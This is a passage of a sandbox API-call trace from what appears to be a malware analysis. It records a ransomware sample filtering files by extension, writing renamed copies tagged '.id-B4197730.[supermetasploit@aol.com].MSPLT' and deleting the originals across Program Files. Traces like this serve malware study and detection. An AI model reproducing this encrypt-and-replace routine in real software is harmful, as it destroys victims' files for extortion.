lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.291] lstrlenW (lpString=".zip") returned 4 [0173.291] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString=".rar") returned 4 [0173.291] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString=".bz2") returned 4 [0173.291] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString=".7z") returned 3 [0173.292] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0173.292] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.292] lstrlenW (lpString=".dbf") returned 4 [0173.292] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0173.292] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.292] lstrlenW (lpString=".1cd") returned 4 [0173.292] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0173.292] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.292] lstrlenW (lpString=".jpg") returned 4 [0173.292] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0173.292] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.292] lstrlenW (lpString="C2RHeartbeatConfig.xml") returned 22 [0173.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0173.293] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=4136) returned 1 [0173.293] CloseHandle (hObject=0x384) returned 1 [0173.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 0x20 [0173.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0173.293] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.294] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0173.300] GetLastError () returned 0x0 [0173.300] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1028, lpOverlapped=0x0) returned 1 [0173.895] WriteFile (in: hFile=0x374, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x1030, lpOverlapped=0x0) returned 1 [0173.896] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0173.896] WriteFile (in: hFile=0x374, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x100, lpOverlapped=0x0) returned 1 [0173.896] SetEndOfFile (hFile=0x374) returned 1 [0173.897] CloseHandle (hObject=0x374) returned 1 [0173.899] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.899] SetEndOfFile (hFile=0x384) returned 1 [0173.900] CloseHandle (hObject=0x384) returned 1 [0173.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0173.901] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 1 [0173.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.902] lstrlenW (lpString=".doc") returned 4 [0173.902] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.902] lstrlenW (lpString=".docx") returned 5 [0173.902] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0173.902] lstrlenW (lpString=".pdf") returned 4 [0173.902] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString=".xls") returned 4 [0173.903] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString=".xlsx") returned 5 [0173.903] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0173.903] lstrlenW (lpString=".ppt") returned 4 [0173.903] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.903] lstrlenW (lpString=".zip") returned 4 [0173.903] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.903] lstrlenW (lpString=".rar") returned 4 [0173.903] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString=".bz2") returned 4 [0173.903] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString=".7z") returned 3 [0173.903] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.903] lstrlenW (lpString=".dbf") returned 4 [0173.903] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.903] lstrlenW (lpString=".1cd") returned 4 [0173.903] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.903] lstrlenW (lpString=".jpg") returned 4 [0173.903] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.903] lstrlenW (lpString=".doc") returned 4 [0173.903] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString=".docx") returned 5 [0173.904] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0173.904] lstrlenW (lpString=".pdf") returned 4 [0173.904] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString=".xls") returned 4 [0173.904] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString=".xlsx") returned 5 [0173.904] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0173.904] lstrlenW (lpString=".ppt") returned 4 [0173.904] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.904] lstrlenW (lpString=".zip") returned 4 [0173.904] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.904] lstrlenW (lpString=".rar") returned 4 [0173.904] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString=".bz2") returned 4 [0173.904] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString=".7z") returned 3 [0173.904] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.904] lstrlenW (lpString=".dbf") returned 4 [0173.904] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.904] lstrlenW (lpString=".1cd") returned 4 [0173.904] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0173.904] lstrlenW (lpString=".jpg") returned 4 [0173.904] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.905] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.905] lstrlenW (lpString="ea.xml") returned 6 [0173.905] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.118] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=384) returned 1 [0174.118] CloseHandle (hObject=0x374) returned 1 [0174.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0174.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.118] lstrlenW (lpString=".doc") returned 4 [0174.119] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString=".docx") returned 5 [0174.119] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0174.119] lstrlenW (lpString=".pdf") returned 4 [0174.119] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString=".xls") returned 4 [0174.119] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString=".xlsx") returned 5 [0174.119] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0174.119] lstrlenW (lpString=".ppt") returned 4 [0174.119] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.119] lstrlenW (lpString=".zip") returned 4 [0174.119] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.119] lstrlenW (lpString=".rar") returned 4 [0174.119] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString=".bz2") returned 4 [0174.119] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString=".7z") returned 3 [0174.119] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.119] lstrlenW (lpString=".dbf") returned 4 [0174.119] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.119] lstrlenW (lpString=".1cd") returned 4 [0174.119] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.119] lstrlenW (lpString=".jpg") returned 4 [0174.120] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.120] lstrlenW (lpString=".doc") returned 4 [0174.120] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString=".docx") returned 5 [0174.120] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0174.120] lstrlenW (lpString=".pdf") returned 4 [0174.120] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString=".xls") returned 4 [0174.120] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString=".xlsx") returned 5 [0174.120] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0174.120] lstrlenW (lpString=".ppt") returned 4 [0174.120] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.120] lstrlenW (lpString=".zip") returned 4 [0174.120] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.120] lstrlenW (lpString=".rar") returned 4 [0174.120] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString=".bz2") returned 4 [0174.120] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.120] lstrlenW (lpString=".7z") returned 3 [0174.120] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.120] lstrlenW (lpString=".dbf") returned 4 [0174.120] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.121] lstrlenW (lpString=".1cd") returned 4 [0174.121] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0174.121] lstrlenW (lpString=".jpg") returned 4 [0174.121] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.121] lstrcmpiW (lpString1=".dat", lpString2=".MSPLT") returned -1 [0174.122] lstrlenW (lpString="hwrusash.dat") returned 12 [0174.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.344] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=3380096) returned 1 [0174.344] CloseHandle (hObject=0x374) returned 1 [0174.344] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat")) returned 0x20 [0174.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.345] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0174.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.346] lstrlenW (lpString=".doc") returned 4 [0174.351] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0174.388] lstrlenW (lpString=".docx") returned 5 [0174.388] lstrcmpiW (lpString1=".docx", lpString2="h.dat") returned -1 [0174.388] lstrlenW (lpString=".pdf") returned 4 [0174.388] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0174.388] lstrlenW (lpString=".xls") returned 4 [0174.388] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0174.388] lstrlenW (lpString=".xlsx") returned 5 [0174.388] lstrcmpiW (lpString1=".xlsx", lpString2="h.dat") returned -1 [0174.388] lstrlenW (lpString=".ppt") returned 4 [0174.389] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0174.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.389] lstrlenW (lpString=".zip") returned 4 [0174.389] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0174.389] lstrlenW (lpString=".rar") returned 4 [0174.389] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0174.389] lstrlenW (lpString=".bz2") returned 4 [0174.389] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0174.389] lstrlenW (lpString=".7z") returned 3 [0174.389] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0174.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.389] lstrlenW (lpString=".dbf") returned 4 [0174.389] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0174.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.389] lstrlenW (lpString=".1cd") returned 4 [0174.389] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0174.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.389] lstrlenW (lpString=".jpg") returned 4 [0174.389] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0174.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.389] lstrlenW (lpString=".doc") returned 4 [0174.389] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0174.389] lstrlenW (lpString=".docx") returned 5 [0174.389] lstrcmpiW (lpString1=".docx", lpString2="h.dat") returned -1 [0174.389] lstrlenW (lpString=".pdf") returned 4 [0174.389] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0174.390] lstrlenW (lpString=".xls") returned 4 [0174.390] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0174.390] lstrlenW (lpString=".xlsx") returned 5 [0174.390] lstrcmpiW (lpString1=".xlsx", lpString2="h.dat") returned -1 [0174.390] lstrlenW (lpString=".ppt") returned 4 [0174.390] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0174.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.390] lstrlenW (lpString=".zip") returned 4 [0174.390] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0174.390] lstrlenW (lpString=".rar") returned 4 [0174.390] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0174.390] lstrlenW (lpString=".bz2") returned 4 [0174.390] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0174.390] lstrlenW (lpString=".7z") returned 3 [0174.390] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0174.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.390] lstrlenW (lpString=".dbf") returned 4 [0174.390] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0174.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.390] lstrlenW (lpString=".1cd") returned 4 [0174.390] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0174.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 63 [0174.390] lstrlenW (lpString=".jpg") returned 4 [0174.390] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0174.391] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.391] lstrlenW (lpString="splash.gif") returned 10 [0174.391] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.403] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=8590) returned 1 [0174.403] CloseHandle (hObject=0x2fc) returned 1 [0174.403] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 0x20 [0174.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.404] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.404] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0174.404] GetLastError () returned 0x0 [0174.404] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x218e, lpOverlapped=0x0) returned 1 [0174.418] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x2190, lpOverlapped=0x0) returned 1 [0174.420] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0174.420] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe8, lpOverlapped=0x0) returned 1 [0174.420] SetEndOfFile (hFile=0x2f4) returned 1 [0174.420] CloseHandle (hObject=0x2f4) returned 1 [0174.421] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.422] SetEndOfFile (hFile=0x2fc) returned 1 [0174.423] CloseHandle (hObject=0x2fc) returned 1 [0174.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.423] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 1 [0174.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.424] lstrlenW (lpString=".doc") returned 4 [0174.424] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.424] lstrlenW (lpString=".docx") returned 5 [0174.424] lstrcmpiW (lpString1=".docx", lpString2="h.gif") returned -1 [0174.424] lstrlenW (lpString=".pdf") returned 4 [0174.424] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.424] lstrlenW (lpString=".xls") returned 4 [0174.424] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.424] lstrlenW 